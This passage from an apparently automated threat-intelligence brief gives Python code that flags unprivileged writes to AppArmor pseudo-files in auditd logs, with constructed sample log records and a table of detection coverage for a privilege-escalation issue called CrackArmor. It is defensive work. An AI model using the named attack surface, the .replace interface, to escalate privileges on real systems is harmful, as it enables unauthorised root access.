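    m = re.search(r"msg=audit\([\d.]+:(\d+)\)", line)
    rec["_serial"] = m.group(1) if m else ""
    return rec

def group_events(lines: list) -> dict:
    """Join each SYSCALL record with the PATH records sharing its serial."""
    events = defaultdict(lambda: {"syscall": None, "paths": []})
    for line in lines:
        rec = parse_record(line)
        if rec.get("type") == "SYSCALL":
            events[rec["_serial"]]["syscall"] = rec
        elif rec.get("type") == "PATH":
            events[rec["_serial"]]["paths"].append(rec.get("name", ""))
    return events

def is_unprivileged_apparmor_write(ev: dict) -> bool:
    sc = ev["syscall"]
    if not sc or not any(p.startswith(APPARMOR_DIR) for p in ev["paths"]):
        return False
    if int(sc.get("euid", "0")) == 0:
        return False                                   # root: expected admin path
    arg = {OPEN: "a1", OPENAT: "a2"}.get(int(sc.get("syscall", "-1")))
    flags = int(sc.get(arg, "0"), 16) if arg else 0    # auditd logs args in hex
    return flags & (O_WRONLY | O_RDWR) != 0

def alerts(lines: list) -> list:
    return [(serial, ev["syscall"]["comm"], ev["paths"])
            for serial, ev in group_events(lines).items()
            if is_unprivileged_apparmor_write(ev)]

# Constructed records: uid 1001 opening .replace for write (alert), root's
# apparmor_parser doing the same (expected), uid 1001 reading profiles (benign).
SAMPLE_LOG = [
    'type=SYSCALL msg=audit(1773460000.101:301): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=55aa12f0 a2=1 a3=0 items=1 ppid=2100 pid=2134 auid=1001 uid=1001 gid=1001 euid=1001 comm="python3" exe="/usr/bin/python3" key="apparmor_profile"',
    'type=PATH msg=audit(1773460000.101:301): item=0 name="/sys/kernel/security/apparmor/.replace" inode=12 dev=00:0e mode=0100200 ouid=0 ogid=0',
    'type=SYSCALL msg=audit(1773460000.205:302): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=55aa12f0 a2=1 a3=0 items=1 ppid=1 pid=980 auid=4294967295 uid=0 gid=0 euid=0 comm="apparmor_parser" exe="/sbin/apparmor_parser" key="apparmor_profile"',
    'type=PATH msg=audit(1773460000.205:302): item=0 name="/sys/kernel/security/apparmor/.replace" inode=12 dev=00:0e mode=0100200 ouid=0 ogid=0',
    'type=SYSCALL msg=audit(1773460000.310:303): arch=c000003e syscall=257 success=yes exit=4 a0=ffffff9c a1=55aa13a0 a2=0 a3=0 items=1 ppid=2100 pid=2140 auid=1001 uid=1001 gid=1001 euid=1001 comm="cat" exe="/usr/bin/cat" key="apparmor_profile"',
    'type=PATH msg=audit(1773460000.310:303): item=0 name="/sys/kernel/security/apparmor/profiles" inode=9 dev=00:0e mode=0100444 ouid=0 ogid=0',
]
```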
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|---|---|
| Splunk | Linux pkexec Privilege Escalation | Partial — covers T1068 Linux LPE patterns broadly; not AppArmor-specific but the process behavior (unprivileged process achieving elevated execution) is analogous; useful as baseline while AppArmor-specific rules are developed |
| Elastic | None found | No Elastic rules for AppArmor-specific LPE; auditd integration with Elastic Agent would be needed to surface the pseudo-file access syscalls |
| Sigma | None found | No Sigma rules for CrackArmor; recommend creating custom auditd-based Sigma rule monitoring writes to /sys/kernel/security/apparmor/ from unprivileged UIDs |
Brief generated: 2026-03-14 05:00 PT | Sources gathered from web search, X/social, GitHub PoC monitoring, and CISA KEV